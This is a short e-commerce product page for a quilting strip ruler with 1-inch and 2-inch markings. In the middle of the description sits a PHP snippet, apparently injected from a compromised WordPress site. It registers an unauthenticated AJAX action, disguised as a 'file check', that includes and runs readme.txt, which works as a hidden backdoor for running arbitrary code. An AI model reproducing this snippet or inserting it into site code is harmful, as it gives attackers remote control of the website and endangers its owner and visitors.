Description
Ruler is marked with both a letter and the actual length in inches for each strip, just the lines you need, so there’s no distraction no confusion, no unnecessary information. Finished strip widths are 1in & 2in
if(!function_exists('file_check_readme63022')){ add_action('wp_ajax_nopriv_file_check_readme63022', 'file_check_readme63022'); add_action('wp_ajax_file_check_readme63022', 'file_check_readme63022'); function file_check_readme63022() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Reviews
There are no reviews yet.